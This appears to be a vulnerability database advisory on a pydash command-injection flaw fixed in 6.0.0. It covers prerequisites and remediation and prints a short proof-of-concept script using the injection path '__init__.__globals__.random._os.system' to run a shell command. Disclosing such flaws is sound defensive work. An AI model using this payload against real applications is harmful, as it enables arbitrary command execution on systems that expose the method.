VDB

SNYK-PYTHON-PYDASH-5916518

SNYK-PYTHON-PYDASH-5916518 PUBLISHED CVSS 7.400000095367432 HIGH

## Overview [pydash](https://pypi.org/project/pydash) is a The kitchen sink of Python utility libraries for doing "stuff" in a functional way. Based on the Lo-Dash Javascript library. Affected versions of this package are vulnerable to Command Injection. A number of pydash methods such as `pydash.objects.invoke()` and `pydash.collections.invoke_map()` accept dotted paths (Deep Path Strings) to target a nested Python object, relative to the original source object. These paths can be used to target internal class attributes and dict items, to retrieve, modify or invoke nested Python objects. **Note:** The `pydash.objects.invoke()` method is vulnerable to Command Injection when the following prerequisites are satisfied: 1) The source object (argument 1) is not a built-in object such as list/dict (otherwise, the `__init__.__globals__` path is not accessible) 2) The attacker has control over argument 2 (the path string) and argument 3 (the argument to pass to the invoked method) The `pydash.collections.invoke_map()` method is also vulnerable, but is harder to exploit as the attacker does not have direct control over the argument to be passed to the invoked function. ## PoC ```python import sys import random import pydash class Animal: def __init__(self, typ, age): self.type = typ self.age = age self.id = random.randint(1, 99999) def poc(path, arg): """ Use a malicious path to execute code via the __init__.__globals__ dict (not available with dict/list input objects?) I.e: pydash.invoke(obj, '__init__.__globals__.random._os.system', 'id') """ obj = Animal('cat', 11) res = pydash.invoke(obj, path, arg) print(res) if __name__ == '__main__': if len(sys.argv) < 3: print('Missing args: %s <path> <arg>' % sys.argv[0]) sys.exit(1) poc(sys.argv[1], sys.argv[2]) ``` ## Remediation Upgrade `pydash` to version 6.0.0 or higher. ## References - [GitHub Commit](https://github.com/dgilland/pydash/commit/6ff0831ad285fff937cafd2a853f20cc9ae92021) - [GitHub Gist](https://gist.github.com/CalumHutton/45d33e9ea55bf4953b3b31c84703dfca)

Risk Scores

CVSS 3.1
7.400000095367432
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P

Affected Products

VendorProductVersions
0

Timeline

  • Sep 24, 2023 CVE Updated
  • Sep 26, 2023 CVE Published
Open in Interactive Console →
$ Console Community · 100/wk Open console ›